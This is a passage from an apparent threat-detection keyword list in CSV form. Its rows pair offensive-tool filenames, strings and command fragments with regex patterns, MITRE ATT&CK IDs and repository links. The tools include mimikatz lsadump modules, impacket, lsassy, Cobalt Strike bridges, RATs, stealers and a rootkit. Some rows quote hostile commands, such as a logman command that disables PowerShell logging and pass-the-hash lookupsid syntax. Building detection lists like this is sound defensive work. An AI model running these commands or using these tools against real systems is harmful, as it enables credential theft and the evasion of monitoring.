T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*LockLess.exe*",".{0,1000}LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Locksmith-main.zip*",".{0,1000}Locksmith\-main\.zip.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","7","685","65","2024-04-23T15:48:48Z","2022-04-28T01:37:32Z" "*log4_shell.rb*",".{0,1000}log4_shell\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*log4shell*.nessus.org*",".{0,1000}log4shell.{0,1000}\.nessus\.org.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*log4shell.py*",".{0,1000}log4shell\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*Logging key presses... 
ctrl-c to quit*",".{0,1000}Logging\skey\spresses\.\.\.\sctrl\-c\sto\squit.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*logging.getLogger(""nemesis"")*",".{0,1000}logging\.getLogger\(\""nemesis\""\).{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*LoGiC.NET.exe*",".{0,1000}LoGiC\.NET\.exe.{0,1000}","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","5","6","506","78","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" "*login.php?LOGMEOUTPLZ=true*",".{0,1000}login\.php\?LOGMEOUTPLZ\=true.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*login-securite/lsassy*",".{0,1000}login\-securite\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*loginsight.thrift*",".{0,1000}loginsight\.thrift.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for 
VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campaign that exploits public-facing VMware ESXi product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*logman update trace EventLog-Application --p Microsoft-Windows-PowerShell -ets*",".{0,1000}logman\supdate\strace\sEventLog\-Application\s\-\-p\sMicrosoft\-Windows\-PowerShell\s\-ets.{0,1000}","offensive_tool_keyword","logman","disables Microsoft-Windows-PowerShell event logging until a reboot occurs or the attacker restores the ETW provider","T1562.004 - T1070.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*LogonPasswords\*-LogonPasswords.txt*",".{0,1000}LogonPasswords\\.{0,1000}\-LogonPasswords\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*LogonPasswords\.AllUniqueNTLM.txt*",".{0,1000}LogonPasswords\\\.AllUniqueNTLM\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*LogonTracer*",".{0,1000}LogonTracer.{0,1000}","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","6","10","2628","440","2024-03-25T11:44:14Z","2017-11-24T06:07:49Z" "*logs/maitm.log""*",".{0,1000}logs\/maitm\.log\"".{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*logs/Responder-Session.log*",".{0,1000}logs\/Responder\-Session\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/ridenum.log*",".{0,1000}logs\/ridenum\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/shares-with-SCF.txt*",".{0,1000}logs\/shares\-with\-SCF\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/theHarvester.py.log*",".{0,1000}logs\/theHarvester\.py\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - 
TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logToBeaconLog*",".{0,1000}logToBeaconLog.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*LOLBAS-Project*",".{0,1000}LOLBAS\-Project.{0,1000}","offensive_tool_keyword","LOLBAS-Project","Living Off The Land Binaries and Scripts (and also Libraries) malicious use of legitimate tool","T1072 - T1059.003 - T1059.004 - T1059.001 - T1059.005 - T1564.001","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://lolbas-project.github.io/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*lolbin.exe 
*",".{0,1000}lolbin\.exe\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*LOLBins/NetLoader.xml*",".{0,1000}LOLBins\/NetLoader\.xml.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*Lolipop.php - Edited By KingDefacer*",".{0,1000}Lolipop\.php\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*LOLSpoof.exe*",".{0,1000}LOLSpoof\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*Londor.exe -t Coverage*",".{0,1000}Londor\.exe\s\-t\sCoverage.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*Londor.exe -t Script*",".{0,1000}Londor\.exe\s\-t\sScript.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - 
TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*looCiprian/GC2-sheet*",".{0,1000}looCiprian\/GC2\-sheet.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*lookupsid.py -hashes :* *@* 0*",".{0,1000}lookupsid\.py\s\-hashes\s\:.{0,1000}\s.{0,1000}\@.{0,1000}\s0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*lookupsid.py*",".{0,1000}lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*looneypwner.sh *",".{0,1000}looneypwner\.sh\s.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*LooneyPwner-main*",".{0,1000}LooneyPwner\-main.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","1","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*loot_memory.py*",".{0,1000}loot_memory\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*LordNoteworthy*",".{0,1000}LordNoteworthy.{0,1000}","offensive_tool_keyword","Github Username","Github username of hacker known for malware pocs and windows exploitations","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Lost connection to team server! Sleeping 60 second and retrying?*",".{0,1000}Lost\sconnection\sto\steam\sserver!\sSleeping\s60\ssecond\sand\sretrying\?.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*lotus2john.py*",".{0,1000}lotus2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Lovely-Potato*",".{0,1000}Lovely\-Potato.{0,1000}","offensive_tool_keyword","Lovely-Potato","Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. 
another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM","T1055 - T1547.002 - T1543.003 - T1059.001","TA0004 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/TsukiCTF/Lovely-Potato","1","0","N/A","10","2","138","29","2021-07-21T18:09:14Z","2019-05-17T19:37:20Z" "*lpfcbjknijpeeillifnkikgncikgfhdo*",".{0,1000}lpfcbjknijpeeillifnkikgncikgfhdo.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ls -la netkit.ko*",".{0,1000}ls\s\-la\snetkit\.ko.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*L'S', L'e', L'D', L'e', L'b', L'u', L'g', L'P', L'r', L'i', L'v', L'i', L'l', L'e', L'g', L'e'*",".{0,1000}L\'S\',\sL\'e\',\sL\'D\',\sL\'e\',\sL\'b\',\sL\'u\',\sL\'g\',\sL\'P\',\sL\'r\',\sL\'i\',\sL\'v\',\sL\'i\',\sL\'l\',\sL\'e\',\sL\'g\',\sL\'e\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*lsa_decryptor.py*",".{0,1000}lsa_decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - 
TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*lsa_decryptor_nt*.py*",".{0,1000}lsa_decryptor_nt.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*lsa_secrets.md*",".{0,1000}lsa_secrets\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*lsadump.exe*",".{0,1000}lsadump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*lsadump::*",".{0,1000}lsadump\:\:.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::backupkeys*",".{0,1000}lsadump\:\:backupkeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::cache*",".{0,1000}lsadump\:\:cache.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::changentlm*",".{0,1000}lsadump\:\:changentlm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::dcshadow*",".{0,1000}lsadump\:\:dcshadow.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::dcsyn*",".{0,1000}lsadump\:\:dcsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::lsa*",".{0,1000}lsadump\:\:lsa.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::mbc*",".{0,1000}lsadump\:\:mbc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also 